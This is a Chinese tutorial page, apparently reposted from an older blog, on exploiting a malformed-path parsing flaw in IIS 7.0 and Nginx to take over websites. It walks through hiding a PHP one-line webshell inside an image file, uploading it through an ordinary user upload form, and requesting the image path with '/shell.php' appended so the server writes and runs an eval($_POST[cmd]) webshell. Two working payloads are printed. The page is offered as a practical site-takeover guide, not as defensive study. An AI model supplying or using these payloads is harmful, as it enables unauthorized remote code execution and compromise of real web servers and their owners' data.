當(dāng)前位置:
首頁 >
通杀IIS7.0畸形解析0day漏洞
發(fā)布時(shí)間:2024/7/19
28
豆豆
生活随笔
收集整理的這篇文章主要介紹了
通杀IIS7.0畸形解析0day漏洞
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
先合并一張PHP一句話圖片馬,合并方法:
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
②、用edjpgcom,進(jìn)行圖片和一句話木馬的合并,
圖片隨便找一張.
【順帶著說一下edjpgcom的使用方法:打開edjpgcom.exe所在文件夾,然后把你所要修改的圖片拖動(dòng)到
edjpgcom.exe上面,然后edjpgcom.exe會(huì)自動(dòng)打開,寫入想要些的代碼即可】
一句話:
| <?PHP fputs(fopen(’shell.php’,’w’),’<?php eval($_POST[cmd])?>’);?> |
找到圖片地址,然后在地址后面加個(gè)shell.php,在瀏覽器中運(yùn)行。
比如假設(shè)圖片地址為http://blog.exehack.com/tupian/1.jpg
則執(zhí)行地址為http://blog.exehack.com/tupian/1.jpg/shell.php
然后,會(huì)在目錄下生成shell.php。比如:http://blog.exehack.com/tupian/shell.php
shell.php就是我們的一句話地址。再拿一句話的客戶端連接這個(gè)一句話地址就好。
上面就是Nginx拿站全過程,IIS7.0的畸形解析和這個(gè)類似。?
?
找到某個(gè)使用IIS7.0架設(shè)的站,然后找到其中的圖片上傳點(diǎn)(不需要管理權(quán)限,普通注冊(cè)用戶即可搞定),把PHP大馬后綴改成.jpg,傳上去,得到圖片地址。
?
在圖片格式后面添加xx.php xx隨便你怎么填。只要后綴為.php就好。
?
| <?fputs(fopen(“3Kin.PHP”,”w”),”<?eval(\$_POST[3Kin]);?>”)?> |
轉(zhuǎn)載于:https://www.cnblogs.com/canlay/archive/2012/01/17/2325123.html
總結(jié)
以上是生活随笔為你收集整理的通杀IIS7.0畸形解析0day漏洞的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 解决FileUpload控件上传大文件被
- 下一篇: php页面缓存